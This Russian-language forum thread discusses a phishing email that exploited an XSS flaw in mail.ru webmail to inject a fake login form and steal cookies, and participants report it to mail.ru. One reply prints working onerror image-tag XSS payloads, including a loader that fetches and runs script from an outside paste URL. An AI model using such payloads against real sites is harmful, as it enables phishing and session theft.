|
|
Где изображение там это.
![]() Ведет на js файл с этим содержанием. http://zalil.ru/33232691 PS. Сюда скопировать не мог, так как превышает 10000 символов А где красненький кружечек, там ничего особенного когда mail не может загрузить картинку он выдает такую вот штучку ![]() |
Мне собственно говоря, какой злоумышленники отправляют код)) Чтобы в страницу mail.ru впечатался так сказать свой java который через 30 секунд после открытия письма выдавал фишинговую форму прям на сайте)
|
Цитата:
Оно ещё и куки пытается стащить. vagabunt, лучше сообщите об этом в техподдержку mail.ru А ещё лучше — пользуйтесь GMail :-) |
Цитата:
|
vagabunt,
а исходник письма можете показать? |
Информация отправлена разработчикам Mail.ru
Надеюсь, топикстартер только за ;) |
Цитата:
<img src onerror=alert('XSS')> вместо alert'а можно подставить, что хочешь. и кстати, скрипт можно было вставить короче : <img src onerror=(a=document).body.appendChild(a.createElement('scr'+'ipt')).src='http://pastie.org/pastes/3909315/text';a.b;> только вот вопрос.. как оно на mail.ru прошло? |
Цитата:
Топикустартеру интересно)) какой скрипт отсылают через сендер) |
Часовой пояс GMT +3, время: 19:42. |
|